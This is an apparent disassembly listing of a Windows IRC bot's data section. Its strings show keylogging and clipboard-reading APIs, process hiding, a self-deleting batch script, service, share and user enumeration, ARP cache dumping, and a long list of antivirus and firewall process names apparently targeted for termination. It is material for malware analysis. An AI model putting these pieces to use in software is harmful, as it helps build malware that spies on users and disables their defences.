aOpenprocesstok db 'OpenProcessToken',0 ; DATA XREF: sub_40E59D:loc_40E891�o
align 4
aRegclosekey db 'RegCloseKey',0 ; DATA XREF: sub_40E59D+2AC�o
align 8
aRegdeletevalue db 'RegDeleteValueA',0 ; DATA XREF: sub_40E59D+29F�o
dd 0
aRegqueryvaluee db 'RegQueryValueExA',0 ; DATA XREF: sub_40E59D+292�o
align 10h
aRegsetvalueexa db 'RegSetValueExA',0 ; DATA XREF: sub_40E59D+285�o
align 10h
dd 0
aRegcreatekeyex db 'RegCreateKeyExA',0 ; DATA XREF: sub_40E59D+278�o
align 8
aRegopenkeyexa db 'RegOpenKeyExA',0 ; DATA XREF: sub_40E59D+270�o
align 4
aAdvapi32_dll db 'advapi32.dll',0 ; DATA XREF: sub_40E59D:loc_40E7FC�o
align 4
aGetforegroundw db 'GetForegroundWindow',0 ; DATA XREF: sub_40E59D+21A�o
align 10h
aGetwindowtexta db 'GetWindowTextA',0 ; DATA XREF: sub_40E59D+20D�o
align 10h
dd 0
aGetkeystate db 'GetKeyState',0 ; DATA XREF: sub_40E59D+200�o
dd 0
aGetasynckeysta db 'GetAsyncKeyState',0 ; DATA XREF: sub_40E59D:loc_40E795�o
align 4
aExitwindowsex db 'ExitWindowsEx',0 ; DATA XREF: sub_40E59D+1A0�o
align 4
aCloseclipboard db 'CloseClipboard',0 ; DATA XREF: sub_40E59D+193�o
align 4
dd 0
aGetclipboardda db 'GetClipboardData',0 ; DATA XREF: sub_40E59D+186�o
align 10h
aOpenclipboard db 'OpenClipboard',0 ; DATA XREF: sub_40E59D+179�o
align 10h
aDestroywindow db 'DestroyWindow',0 ; DATA XREF: sub_40E59D+16C�o
align 10h
aIswindow db 'IsWindow',0 ; DATA XREF: sub_40E59D+15F�o
align 4
aFindwindowa db 'FindWindowA',0 ; DATA XREF: sub_40E59D+152�o
dd 0
aSendmessagea db 'SendMessageA',0 ; DATA XREF: sub_40E59D+14A�o
align 4
aUser32_dll db 'user32.dll',0 ; DATA XREF: sub_40E59D:loc_40E6D2�o
; sub_41F80A+D�o
align 4
dd 0
aRegisterservic db 'RegisterServiceProcess',0 ; DATA XREF: sub_40E59D:loc_40E6A5�o
align 8
aQueryperform_0 db 'QueryPerformanceFrequency',0 ; DATA XREF: sub_40E59D+A0�o
align 8
aQueryperforman db 'QueryPerformanceCounter',0 ; DATA XREF: sub_40E59D+93�o
dd 0
aSearchpatha db 'SearchPathA',0 ; DATA XREF: sub_40E59D+86�o
dd 0
aGetdrivetypea db 'GetDriveTypeA',0 ; DATA XREF: sub_40E59D+79�o
align 4
aGetlogicaldriv db 'GetLogicalDriveStringsA',0 ; DATA XREF: sub_40E59D+6C�o
align 10h
aGetdiskfreespa db 'GetDiskFreeSpaceExA',0 ; DATA XREF: sub_40E59D+5F�o
align 8
aModule32first db 'Module32First',0 ; DATA XREF: sub_40E59D+52�o
align 4
aProcess32next db 'Process32Next',0 ; DATA XREF: sub_40E59D+45�o
align 4
aProcess32first db 'Process32First',0 ; DATA XREF: sub_40E59D+38�o
align 4
dd 0
aCreatetoolhelp db 'CreateToolhelp32Snapshot',0 ; DATA XREF: sub_40E59D+2B�o
align 4
dd 0
aSeterrormode db 'SetErrorMode',0 ; DATA XREF: sub_40E59D+23�o
align 4
aKernel32_dll db 'kernel32.dll',0 ; DATA XREF: sub_40E59D+A�o
align 4
unk_4303AC db 2 ; DATA XREF: sub_40F54D+2F2�o
db 5Bh, 2, 20h
db 2Dh ; -
db 20h, 69h, 72h
db 1Fh
db 62h, 1Fh, 20h
db 2Dh ; -
db 20h, 2, 5Dh
db 2
aDllTestComplet db ' DLL test complete.',0
dd 2 dup(0)
aAvicap32_dllFa db 'Avicap32.dll failed. <%d>',0 ; DATA XREF: sub_40F54D+2CC�o
align 4
dd 0
aOdbc32_dllFail db 'Odbc32.dll failed. <%d>',0 ; DATA XREF: sub_40F54D+298�o
align 8
aShell32_dllFai db 'Shell32.dll failed. <%d>',0 ; DATA XREF: sub_40F54D+264�o
align 8
aMpr32_dllFaile db 'Mpr32.dll failed. <%d>',0 ; DATA XREF: sub_40F54D+230�o
align 10h
dd 0
aIphlpapi_dllFa db 'Iphlpapi.dll failed. <%d>',0 ; DATA XREF: sub_40F54D+1FC�o
align 10h
dd 0
aDnsapi_dllFail db 'Dnsapi.dll failed. <%d>',0 ; DATA XREF: sub_40F54D+1C8�o
align 10h
aNetapi32_dllFa db 'Netapi32.dll failed. <%d>',0 ; DATA XREF: sub_40F54D+194�o
align 10h
aIcmp_dllFailed db 'Icmp.dll failed. <%d>',0 ; DATA XREF: sub_40F54D+160�o
align 4
dd 0
aWininet_dllFai db 'Wininet.dll failed. <%d>',0 ; DATA XREF: sub_40F54D+12C�o
align 4
dd 0
aWs2_32_dllFail db 'Ws2_32.dll failed. <%d>',0 ; DATA XREF: sub_40F54D+F8�o
align 8
aGdi32_dllFaile db 'Gdi32.dll failed. <%d>',0 ; DATA XREF: sub_40F54D+C4�o
align 10h
dd 0
aAdvapi32_dllFa db 'Advapi32.dll failed. <%d>',0 ; DATA XREF: sub_40F54D+90�o
align 10h
dd 0
aUser32_dllFail db 'User32.dll failed. <%d>',0 ; DATA XREF: sub_40F54D+5C�o
align 10h
aKernel32_dllFa db 'Kernel32.dll failed. <%d>',0 ; DATA XREF: sub_40F54D+28�o
align 10h
aSErrorSD_ db '%s Error: %s <%d>.',0 ; DATA XREF: sub_40FC36+72�o
align 8
aMirc_0 db 'mIRC',0 ; DATA XREF: sub_40FD2B+5�o
; sub_412583+18�o
align 10h
aExplorer_exe db 'explorer.exe',0 ; DATA XREF: sub_40FDCD+1C�o
align 10h
aSeshutdownpriv db 'SeShutdownPrivilege',0 ; DATA XREF: sub_40FF37+2�o
align 8
aComspecCSS db '%%comspec%% /c %s %s',0 ; DATA XREF: sub_40FF61+140�o
align 10h
dd 0
a@echoOffRepeat db '@echo off',0Dh,0Ah ; DATA XREF: sub_40FF61+85�o
db ':repeat',0Dh,0Ah
db 'del "%%1"',0Dh,0Ah
db 'if exist "%%1" goto repeat',0Dh,0Ah
db 'del "%s"',0
dd 4 dup(0)
aSdel_bat db '%sdel.bat',0 ; DATA XREF: sub_40FF61+48�o
align 8
off_430648 dd offset aAdd ; DATA XREF: sub_41014B+6D�r
; sub_410626+50�r ...
; "Add"
off_43064C dd offset aAdded ; DATA XREF: sub_41014B+2D�r
; sub_410626+82�r ...
; "Added"
dword_430650 dd 0 ; DATA XREF: sub_41014B+18�r
dd offset aDelete_0 ; "Delete"
dd offset aDeleted ; "Deleted"
align 10h
dd offset aList_0 ; "List"
dd offset aListed ; "Listed"
dd 0
dd offset aStart_0 ; "Start"
dd offset aStarted ; "Started"
align 8
dd offset aStop_0 ; "Stop"
dd offset aStopped_0 ; "Stopped"
dd 1, 4306CCh, 4306C4h, 2, 4306B8h, 4306ACh, 3, 4 dup(0)
aContinued db 'Continued',0
align 4
aContinue_0 db 'Continue',0
align 4
aPaused_0 db 'Paused',0
align 4
aPause_0 db 'Pause',0
align 4
aStopped_0 db 'Stopped',0 ; DATA XREF: .data:0043067C�o
align 10h
aStop_0 db 'Stop',0 ; DATA XREF: .data:00430678�o
align 4
aStarted db 'Started',0 ; DATA XREF: .data:00430670�o
dd 0
aStart_0 db 'Start',0 ; DATA XREF: .data:0043066C�o
align 4
aListed db 'Listed',0 ; DATA XREF: .data:00430664�o
align 4
aList_0 db 'List',0 ; DATA XREF: .data:00430660�o
align 4
aDeleted db 'Deleted',0 ; DATA XREF: .data:00430658�o
align 8
aDelete_0 db 'Delete',0 ; DATA XREF: .data:00430654�o
align 10h
aAdded db 'Added',0 ; DATA XREF: .data:off_43064C�o
align 4
aAdd db 'Add',0 ; DATA XREF: .data:off_430648�o
unk_43072C db 2 ; DATA XREF: sub_41014B+74�o
db 5Bh, 2, 20h
db 2Dh ; -
db 20h, 6Eh, 65h
db 1Fh
db 74h, 1Fh, 20h
db 2Dh ; -
db 20h, 2, 5Dh
db 2
aSNoServiceSpec db ' %s: No service specified.',0
align 4
dd 2 dup(0)
unk_430764 db 2 ; DATA XREF: sub_41014B+55�o
db 5Bh, 2, 20h
db 2Dh ; -
db 20h, 6Eh, 65h
db 1Fh
db 74h, 1Fh, 20h
db 2Dh ; -
db 20h, 2, 5Dh
db 2
aErrorWithServi db ' Error with service: ',27h,'%s',27h,'. %s',0
align 10h
unk_4307A0 db 2 ; DATA XREF: sub_41014B+38�o
db 5Bh, 2, 20h
db 2Dh ; -
db 20h, 6Eh, 65h
db 1Fh
db 74h, 1Fh, 20h
db 2Dh ; -
db 20h, 2, 5Dh
db 2
aSServiceS_ db ' %s service: ',27h,'%s',27h,'.',0
align 10h
aAnUnknownError db 'An unknown error occurred: <%ld>',0 ; DATA XREF: sub_4102BD+12C�o
align 8
aTheSystemIsShu db 'The system is shutting down.',0 ; DATA XREF: sub_4102BD:loc_4103D5�o
align 4
dd 0
aTheServiceHasN db 'The service has not been started.',0 ; DATA XREF: sub_4102BD:loc_4103CE�o
align 10h
dd 0
aTheRequested_1 db 'The requested control code cannot be sent to the service because '
; DATA XREF: sub_4102BD:loc_4103C7�o
db 'the state of the service.',0
align 10h
dd 5 dup(0)
aTheServiceHa_0 db 'The service has been marked for deletion.',0
; DATA XREF: sub_4102BD:loc_4103C0�o
align 10h
dd 2 dup(0)
aTheServiceCoul db 'The service could not be logged on. The account does not have the'
; DATA XREF: sub_4102BD:loc_4103B9�o
db ' correct access rights.',0
align 4
dd 4 dup(0)
aTheSpecified_0 db 'The specified service does not exist.',0
; DATA XREF: sub_4102BD:loc_4103B2�o
align 4
dd 2 dup(0)
aTheServiceHasB db 'The service has been disabled.',0 ; DATA XREF: sub_4102BD:loc_4103AB�o
align 4
dd 2 dup(0)
aTheServiceDe_0 db 'The service depends on another service that has failed to start.',0
; DATA XREF: sub_4102BD:loc_4103A4�o
align 10h
dd 3 dup(0)
aTheServiceDepe db 'The service depends on a service that does not exist or has been '
; DATA XREF: sub_4102BD:loc_41039D�o
db 'marked for deletion.',0
align 4
dd 4 dup(0)
aTheSpecifiedDa db 'The specified database does not exist.',0
; DATA XREF: sub_4102BD:loc_410396�o
align 4
dd 2 dup(0)
aAnInstanceOfTh db 'An instance of the service is already running.',0
; DATA XREF: sub_4102BD:loc_41036B�o
align 4
dd 2 dup(0)
aTheRequested_0 db 'The requested control code is not valid, or it is unacceptable to'
; DATA XREF: sub_4102BD:loc_410364�o
db ' the service.',0
align 4
dd 4 dup(0)
aTheProcessForT db 'The process for the service was started, but it did not call Star'
; DATA XREF: sub_4102BD:loc_41035D�o
db 'tServiceCtrlDispatcher.',0
align 4
dd 4 dup(0)
aAThreadCouldNo db 'A thread could not be created for the service.',0
; DATA XREF: sub_4102BD:loc_410356�o
align 10h
aTheDatabaseIsL db 'The database is locked.',0 ; DATA XREF: sub_4102BD+8F�o
dd 0
aTheServiceCann db 'The service cannot be stopped because other running services are '
; DATA XREF: sub_4102BD:loc_41032B�o
db 'dependent on it.',0
align 10h
dd 4 dup(0)
aTheServiceBina db 'The service binary file could not be found.',0
; DATA XREF: sub_4102BD:loc_410321�o
dd 2 dup(0)
aTheHandleDoesN db 'The handle does not have the required access right.',0
; DATA XREF: sub_4102BD:loc_410317�o
dd 3 dup(0)
aTheHandleIsInv db 'The handle is invalid.',0 ; DATA XREF: sub_4102BD:loc_41030D�o
align 10h
aTheRequestedCo db 'The requested control code is undefined.',0
; DATA XREF: sub_4102BD:loc_410303�o
align 4
dd 2 dup(0)
aTheSpecifiedSe db 'The specified service name is invalid.',0 ; DATA XREF: sub_4102BD+3C�o
align 4
dd 2 dup(0)
aSSS_2 db '%s: %s (%s)',0 ; DATA XREF: sub_41049A+EB�o
dd 0
aStopped db ' Stopped',0 ; DATA XREF: sub_41049A:loc_410566�o
dd 0
aStarting db ' Starting',0 ; DATA XREF: sub_41049A:loc_41055F�o
dd 0
aStoping db ' Stoping',0 ; DATA XREF: sub_41049A:loc_410558�o
dd 0
aRunning db ' Running',0 ; DATA XREF: sub_41049A:loc_410551�o
dd 0
aContinuing db ' Continuing',0 ; DATA XREF: sub_41049A:loc_41054A�o
dd 0
aPausing db ' Pausing',0 ; DATA XREF: sub_41049A:loc_410543�o
dd 0
aPaused db ' Paused',0 ; DATA XREF: sub_41049A:loc_41053C�o
dd 0
aUnknown_0 db ' Unknown',0 ; DATA XREF: sub_41049A+9B�o
dd 0
aTheFollowingWi db 'The following Windows services are registered:',0
; DATA XREF: sub_41049A+25�o
align 4
dd 2 dup(0)
unk_430E0C db 2 ; DATA XREF: sub_410626+AB�o
db 5Bh, 2, 20h
db 2Dh ; -
db 20h, 6Eh, 65h
db 1Fh
db 74h, 1Fh, 20h
db 2Dh ; -
db 20h, 2, 5Dh
db 2
aSNoShareSpecif db ' %s: No share specified.',0
align 4
dd 2 dup(0)
unk_430E44 db 2 ; DATA XREF: sub_410626+89�o
db 5Bh, 2, 20h
db 2Dh ; -
db 20h, 6Eh, 65h
db 1Fh
db 74h, 1Fh, 20h
db 2Dh ; -
db 20h, 2, 5Dh
db 2
aSShareS_ db ' %s share: ',27h,'%s',27h,'.',0
align 10h
unk_430E70 db 2 ; DATA XREF: sub_410626+57�o
db 5Bh, 2, 20h
db 2Dh ; -
db 20h, 6Eh, 65h
db 1Fh
db 74h, 1Fh, 20h
db 2Dh ; -
db 20h, 2, 5Dh
db 2
aSErrorWithShar db ' %s: Error with share: ',27h,'%s',27h,'. %s',0
align 10h
a14s24s6u4s db '%-14S %-24S %-6u %-4s',0 ; DATA XREF: sub_410895+D0�o
align 4
dd 0
aNo db 'No',0 ; DATA XREF: sub_410895+BC�o
align 10h
aYes db 'Yes',0 ; DATA XREF: sub_410895+B5�o
unk_430ED4 db 2 ; DATA XREF: sub_410895+76�o
db 5Bh, 2, 20h
db 2Dh ; -
db 20h, 6Eh, 65h
db 1Fh
db 74h, 1Fh, 20h
db 2Dh ; -
db 20h, 2, 5Dh
db 2
aShareListError db ' Share list error: %s <%ld>',0
align 10h
aShareNameResou db 'Share name: Resource: Uses: Desc:',0
; DATA XREF: sub_410895+26�o
align 10h
unk_430F50 db 2 ; DATA XREF: sub_4109FE+B6�o
db 5Bh, 2, 20h
db 2Dh ; -
db 20h, 6Eh, 65h
db 1Fh
db 74h, 1Fh, 20h
db 2Dh ; -
db 20h, 2, 5Dh
db 2
aSNoUsernameSpe db ' %s: No username specified.',0
dd 3 dup(0)
unk_430F8C db 2 ; DATA XREF: sub_4109FE+94�o
db 5Bh, 2, 20h
db 2Dh ; -
db 20h, 6Eh, 65h
db 1Fh
db 74h, 1Fh, 20h
db 2Dh ; -
db 20h, 2, 5Dh
db 2
aSErrorWithUser db ' %s: Error with username: ',27h,'%s',27h,'. %s',0
align 10h
unk_430FD0 db 2 ; DATA XREF: sub_4109FE+6D�o
db 5Bh, 2, 20h
db 2Dh ; -
db 20h, 6Eh, 65h
db 1Fh
db 74h, 1Fh, 20h
db 2Dh ; -
db 20h, 2, 5Dh
db 2
aSUsernameS_ db ' %s username: ',27h,'%s',27h,'.',0
align 10h
unk_431000 db 2 ; DATA XREF: sub_410B94+394�o
db 5Bh, 2, 20h
db 2Dh ; -
db 20h, 6Eh, 65h
db 1Fh
db 74h, 1Fh, 20h
db 2Dh ; -
db 20h, 2, 5Dh
db 2
aUserInfoErrorL db ' User info error: <%ld>',0
dd 2 dup(0)
aUnitsPerWeekD db 'Units Per Week: %d',0 ; DATA XREF: sub_410B94+36A�o
align 4
dd 0
aMax_StorageD db 'Max. Storage: %d',0 ; DATA XREF: sub_410B94+33F�o
align 10h
aUserSLanguageD db 'User',27h,'s Language: %d',0 ; DATA XREF: sub_410B94+317�o
align 8
aCountryCodeD db 'Country Code: %d',0 ; DATA XREF: sub_410B94+2EC�o
align 4
aWorkstationsS db 'Workstations: %S',0 ; DATA XREF: sub_410B94+2C4�o
align 10h
aLogonServerS db 'Logon Server: %S',0 ; DATA XREF: sub_410B94+299�o
align 4
aLastLogoffD db 'Last Logoff: %d',0 ; DATA XREF: sub_410B94+271�o
align 8
aLastLogonD db 'Last Logon: %d',0 ; DATA XREF: sub_410B94+246�o
align 4
dd 0
aNumberOfLogins db 'Number of Logins: %d',0 ; DATA XREF: sub_410B94+21E�o
align 8
aBadPasswordCou db 'Bad Password Count: %d',0 ; DATA XREF: sub_410B94+1F3�o
align 10h
dd 0
aPasswordAgeD db 'Password Age: %d',0 ; DATA XREF: sub_410B94+1CB�o
align 4
aParametersS db 'Parameters: %S',0 ; DATA XREF: sub_410B94+1A0�o
align 4
dd 0
aHomeDirectoryS db 'Home Directory: %S',0 ; DATA XREF: sub_410B94+178�o
align 10h
dd 0
aAuthFlagsD db 'Auth Flags: %d',0 ; DATA XREF: sub_410B94+14D�o
align 8
aPrivilegeLevel db 'Privilege Level: %s',0 ; DATA XREF: sub_410B94+125�o
align 10h
aCommentS db 'Comment: %S',0 ; DATA XREF: sub_410B94+D4�o
align 10h
aUserCommentS db 'User Comment: %S',0 ; DATA XREF: sub_410B94+AC�o
align 4
aFullNameS db 'Full Name: %S',0 ; DATA XREF: sub_410B94+81�o
align 4
aAccountS db 'Account: %S',0 ; DATA XREF: sub_410B94+50�o
dd 0
aTotalUsersFoun db 'Total users found: %d.',0 ; DATA XREF: sub_411055+14F�o
align 10h
unk_4311E0 db 2 ; DATA XREF: sub_411055+F7�o
db 5Bh, 2, 20h
db 2Dh ; -
db 20h, 6Eh, 65h
db 1Fh
db 74h, 1Fh, 20h
db 2Dh ; -
db 20h, 2, 5Dh
db 2
aAnAccessViolat db ' An access violation has occured.',0
align 10h
aS_3 db ' %S',0 ; DATA XREF: sub_411055+BE�o
align 4
unk_431228 db 2 ; DATA XREF: sub_411055+7A�o
db 5Bh, 2, 20h
db 2Dh ; -
db 20h, 6Eh, 65h
db 1Fh
db 74h, 1Fh, 20h
db 2Dh ; -
db 20h, 2, 5Dh
db 2
aUserListErrorS db ' User list error: %s <%ld>',0
align 10h
aUsernameAccoun db 'Username accounts for local system:',0 ; DATA XREF: sub_411055+29�o
dd 2 dup(0)
aNetworkConnect db 'Network connection not found.',0 ; DATA XREF: sub_411235:loc_411352�o
align 10h
aTheUserNameCou db 'The user name could not be found.',0 ; DATA XREF: sub_411235:loc_41134B�o
align 8
aShareNotFound_ db 'Share not found.',0 ; DATA XREF: sub_411235:loc_411344�o
align 4
aTheComputerNam db 'The computer name is invalid.',0 ; DATA XREF: sub_411235:loc_41133D�o
align 10h
aAnUnknownErr_0 db 'An unknown error occurred.',0 ; DATA XREF: sub_411235:loc_411336�o
align 10h
aThePasswordIsS db 'The password is shorter than required (or does not meet the passw'
; DATA XREF: sub_411235:loc_411319�o
db 'ord policy requirement.)',0
align 4
dd 4 dup(0)
aTheGroupAlread db 'The group already exists.',0 ; DATA XREF: sub_411235:loc_411312�o
align 4
dd 0
aTheUserAccount db 'The user account already exists.',0 ; DATA XREF: sub_411235:loc_41130B�o
align 10h
dd 0
aTheOperationIs db 'The operation is allowed only on the primary domain controller of'
; DATA XREF: sub_411235+CF�o
db ' the domain.',0
align 4
dd 4 dup(0)
aAGeneralFailur db 'A general failure occurred in the network hardware.',0
; DATA XREF: sub_411235:loc_4112E0�o
dd 3 dup(0)
aLevelParameter db 'Level parameter is invalid.',0 ; DATA XREF: sub_411235:loc_4112D9�o
dd 2 dup(0)
aDeviceOrDirect db 'Device or directory does not exist.',0
; DATA XREF: sub_411235:loc_4112D2�o
dd 2 dup(0)
aInvalidForRedi db 'Invalid for redirected resource.',0 ; DATA XREF: sub_411235:loc_4112C8�o
align 4
dd 0
aDuplicateShare db 'Duplicate share name.',0 ; DATA XREF: sub_411235+89�o
align 8
aTheNameIsInval db 'The name is invalid.',0 ; DATA XREF: sub_411235:loc_4112A2�o
align 10h
dd 0
aAccessDenied_ db 'Access denied.',0 ; DATA XREF: sub_411235:loc_411298�o
align 8
aNotEnoughMemor db 'Not enough memory.',0 ; DATA XREF: sub_411235:loc_41128E�o
align 10h
aThisNetworkReq db 'This network request is not supported.',0
; DATA XREF: sub_411235:loc_411284�o
align 10h
aServerNameNotF db 'Server name not found.',0 ; DATA XREF: sub_411235:loc_41127A�o
align 4
dd 0
aInvalidParamet db 'Invalid parameter.',0 ; DATA XREF: sub_411235+3B�o
align 10h
dd 0
unk_4315C4 db 2 ; DATA XREF: sub_4113B6+AB�o
db 5Bh, 2, 20h
db 2Dh ; -
db 20h, 6Eh, 65h
db 1Fh
db 74h, 1Fh, 20h
db 2Dh ; -
db 20h, 2, 5Dh
db 2
aSServerSMessag db ' %s <Server: %S> <Message: %S>',0
align 4
dd 3 dup(0)
unk_431604 db 2 ; DATA XREF: sub_4113B6+81�o
db 5Bh, 2, 20h
db 2Dh ; -
db 20h, 6Eh, 65h
db 1Fh
db 74h, 1Fh, 20h
db 2Dh ; -
db 20h, 2, 5Dh
db 2
aMessageSentSuc db ' Message sent successfully.',0
align 10h
dword_431640 dd 20025B02h, 6C66202Dh, 64687375h, 1F731F6Eh, 2202D20h
; DATA XREF: sub_4115A6:loc_411665�o
dd 0BB20025Dh
aNotSupportedBy db ' Not supported by this system.',0
dd 3 dup(0)
dword_431684 dd 20025B02h, 6C66202Dh, 64687375h, 1F731F6Eh, 2202D20h
; DATA XREF: sub_4115A6:loc_411633�o
dd 0BB20025Dh
aUnableToAlloca db ' Unable to allocation ARP cache.',0
align 10h
dd 3 dup(0)
dword_4316CC dd 20025B02h, 6C66202Dh, 64687375h, 1F731F6Eh, 2202D20h
; DATA XREF: sub_4115A6:loc_4115FF�o
dd 0BB20025Dh
aArpCacheIsEmpt db ' ARP cache is empty.',0
align 4
dd 2 dup(0)
dword_431704 dd 20025B02h, 6C66202Dh, 64687375h, 1F731F6Eh, 2202D20h
; DATA XREF: sub_4115A6+49�o
dd 0BB20025Dh
aErrorGettingAr db ' Error getting ARP cache: <%d>.',0
align 10h
dd 2 dup(0)
dword_431748 dd 7530h ; DATA XREF: sub_411C89+12�r
off_43174C dd offset aAckwin32_exe ; DATA XREF: sub_411876+CB�o
; "ACKWIN32.EXE"
dd offset aAdaware_exe ; "ADAWARE.EXE"
dd offset aAdvxdwin_exe ; "ADVXDWIN.EXE"
dd offset aAgentsvr_exe ; "AGENTSVR.EXE"
dd offset aAgentw_exe ; "AGENTW.EXE"
dd offset aAlertsvc_exe ; "ALERTSVC.EXE"
dd offset aAlevir_exe ; "ALEVIR.EXE"
dd offset aAlogserv_exe ; "ALOGSERV.EXE"
dd offset aAmon9x_exe ; "AMON9X.EXE"
dd offset aAntiTrojan_exe ; "ANTI-TROJAN.EXE"
dd offset aAntivirus_exe ; "ANTIVIRUS.EXE"
dd offset aAnts_exe ; "ANTS.EXE"
dd offset aApimonitor_exe ; "APIMONITOR.EXE"
dd offset aAplica32_exe ; "APLICA32.EXE"
dd offset aApvxdwin_exe ; "APVXDWIN.EXE"
dd offset aArr_exe ; "ARR.EXE"
dd offset aAtcon_exe ; "ATCON.EXE"
dd offset aAtguard_exe ; "ATGUARD.EXE"
dd offset aAtro55en_exe ; "ATRO55EN.EXE"
dd offset aAtupdater_exe ; "ATUPDATER.EXE"
dd offset aAtupdater_exe ; "ATUPDATER.EXE"
dd offset aAtwatch_exe ; "ATWATCH.EXE"
dd offset aAu_exe ; "AU.EXE"
dd offset aAupdate_exe ; "AUPDATE.EXE"
dd offset aAupdate_exe ; "AUPDATE.EXE"
dd offset aAutodown_exe ; "AUTODOWN.EXE"
dd offset aAutodown_exe ; "AUTODOWN.EXE"
dd offset aAutotrace_exe ; "AUTOTRACE.EXE"
dd offset aAutotrace_exe ; "AUTOTRACE.EXE"
dd offset aAutoupdate_exe ; "AUTOUPDATE.EXE"
dd offset aAutoupdate_exe ; "AUTOUPDATE.EXE"
dd offset aAvconsol_exe ; "AVCONSOL.EXE"
dd offset aAve32_exe ; "AVE32.EXE"
dd offset aAvgcc32_exe ; "AVGCC32.EXE"
dd offset aAvgctrl_exe ; "AVGCTRL.EXE"
dd offset aAvgnt_exe ; "AVGNT.EXE"
dd offset aAvgserv_exe ; "AVGSERV.EXE"
dd offset aAvgserv9_exe ; "AVGSERV9.EXE"
dd offset aAvguard_exe ; "AVGUARD.EXE"
dd offset aAvgw_exe ; "AVGW.EXE"
dd offset aAvkpop_exe ; "AVKPOP.EXE"
dd offset aAvkserv_exe ; "AVKSERV.EXE"
dd offset aAvkservice_exe ; "AVKSERVICE.EXE"
dd offset aAvkwctl9_exe ; "AVKWCTl9.EXE"
dd offset aAvltmain_exe ; "AVLTMAIN.EXE"
dd offset aAvnt_exe ; "AVNT.EXE"
dd offset aAvp_exe ; "AVP.EXE"
dd offset aAvp32_exe ; "AVP32.EXE"
dd offset aAvpcc_exe ; "AVPCC.EXE"
dd offset aAvpdos32_exe ; "AVPDOS32.EXE"
dd offset aAvpm_exe ; "AVPM.EXE"
dd offset aAvptc32_exe ; "AVPTC32.EXE"
dd offset aAvpupd_exe ; "AVPUPD.EXE"
dd offset aAvpupd_exe ; "AVPUPD.EXE"
dd offset aAvsched32_exe ; "AVSCHED32.EXE"
dd offset aAvsynmgr_exe ; "AVSYNMGR.EXE"
dd offset aAvwin95_exe ; "AVWIN95.EXE"
dd offset aAvwinnt_exe ; "AVWINNT.EXE"
dd offset aAvwupd_exe ; "AVWUPD.EXE"
dd offset aAvwupd32_exe ; "AVWUPD32.EXE"
dd offset aAvwupd32_exe ; "AVWUPD32.EXE"
dd offset aAvwupsrv_exe ; "AVWUPSRV.EXE"
dd offset aAvxmonitor9x_e ; "AVXMONITOR9X.EXE"
dd offset aAvxmonitornt_e ; "AVXMONITORNT.EXE"
dd offset aAvxquar_exe ; "AVXQUAR.EXE"
dd offset aAvxquar_exe ; "AVXQUAR.EXE"
dd offset aBackweb_exe ; "BACKWEB.EXE"
dd offset aBargains_exe ; "BARGAINS.EXE"
dd offset aBd_professiona ; "BD_PROFESSIONAL.EXE"
dd offset aBeagle_exe ; "BEAGLE.EXE"
dd offset aBelt_exe ; "BELT.EXE"
dd offset aBidef_exe ; "BIDEF.EXE"
dd offset aBidserver_exe ; "BIDSERVER.EXE"
dd offset aBipcp_exe ; "BIPCP.EXE"
dd offset aBipcpevalsetup ; "BIPCPEVALSETUP.EXE"
dd offset aBisp_exe ; "BISP.EXE"
dd offset aBlackd_exe ; "BLACKD.EXE"
dd offset aBlackice_exe ; "BLACKICE.EXE"
dd offset aBlss_exe ; "BLSS.EXE"
dd offset aBootconf_exe ; "BOOTCONF.EXE"
dd offset aBootwarn_exe ; "BOOTWARN.EXE"
dd offset aBorg2_exe ; "BORG2.EXE"
dd offset aBpc_exe ; "BPC.EXE"
dd offset aBrasil_exe ; "BRASIL.EXE"
dd offset aBs120_exe ; "BS120.EXE"
dd offset aBundle_exe ; "BUNDLE.EXE"
dd offset aBvt_exe ; "BVT.EXE"
dd offset aCcapp_exe ; "CCAPP.EXE"
dd offset aCcevtmgr_exe ; "CCEVTMGR.EXE"
dd offset aCcpxysvc_exe ; "CCPXYSVC.EXE"
dd offset aCdp_exe ; "CDP.EXE"
dd offset aCfd_exe ; "CFD.EXE"
dd offset aCfgwiz_exe ; "CFGWIZ.EXE"
dd offset aCfiadmin_exe ; "CFIADMIN.EXE"
dd offset aCfiaudit_exe ; "CFIAUDIT.EXE"
dd offset aCfiaudit_exe ; "CFIAUDIT.EXE"
dd offset aCfinet_exe ; "CFINET.EXE"
dd offset aCfinet32_exe ; "CFINET32.EXE"
dd offset aClaw95cf_exe ; "CLAW95CF.EXE"
dd offset aClean_exe ; "CLEAN.EXE"
dd offset aCleaner_exe ; "CLEANER.EXE"
dd offset aCleaner3_exe ; "CLEANER3.EXE"
dd offset aCleanpc_exe ; "CLEANPC.EXE"
dd offset aClick_exe ; "CLICK.EXE"
dd offset aCmd32_exe ; "CMD32.EXE"
dd offset aCmesys_exe ; "CMESYS.EXE"
dd offset aCmgrdian_exe ; "CMGRDIAN.EXE"
dd offset aCmon016_exe ; "CMON016.EXE"
dd offset aConnectionmoni ; "CONNECTIONMONITOR.EXE"
dd offset aCpd_exe ; "CPD.EXE"
dd offset aCpf9x206_exe ; "CPF9X206.EXE"
dd offset aCpfnt206_exe ; "CPFNT206.EXE"
dd offset aCtrl_exe ; "CTRL.EXE"
dd offset aCv_exe ; "CV.EXE"
dd offset aCwnb181_exe ; "CWNB181.EXE"
dd offset aCwntdwmo_exe ; "CWNTDWMO.EXE"
dd offset aClaw95_exe ; "Claw95.EXE"
dd offset aClaw95cf_exe ; "CLAW95CF.EXE"
dd offset aDatemanager_ex ; "DATEMANAGER.EXE"
dd offset aDcomx_exe ; "DCOMX.EXE"
dd offset aDefalert_exe ; "DEFALERT.EXE"
dd offset aDefscangui_exe ; "DEFSCANGUI.EXE"
dd offset aDefwatch_exe ; "DEFWATCH.EXE"
dd offset aDeputy_exe ; "DEPUTY.EXE"
dd offset aDivx_exe ; "DIVX.EXE"
dd offset aDllcache_exe ; "DLLCACHE.EXE"
dd offset aDllreg_exe ; "DLLREG.EXE"
dd offset aDoors_exe ; "DOORS.EXE"
dd offset aDpf_exe ; "DPF.EXE"
dd offset aDpfsetup_exe ; "DPFSETUP.EXE"
dd offset aDpps2_exe ; "DPPS2.EXE"
dd offset aDrwatson_exe ; "DRWATSON.EXE"
dd offset aDrweb32_exe ; "DRWEB32.EXE"
dd offset aDrwebupw_exe ; "DRWEBUPW.EXE"
dd offset aDssagent_exe ; "DSSAGENT.EXE"
dd offset aDvp95_exe ; "DVP95.EXE"
dd offset aDvp95_0_exe ; "DVP95_0.EXE"
dd offset aEcengine_exe ; "ECENGINE.EXE"
dd offset aEfpeadm_exe ; "EFPEADM.EXE"
dd offset aEmsw_exe ; "EMSW.EXE"
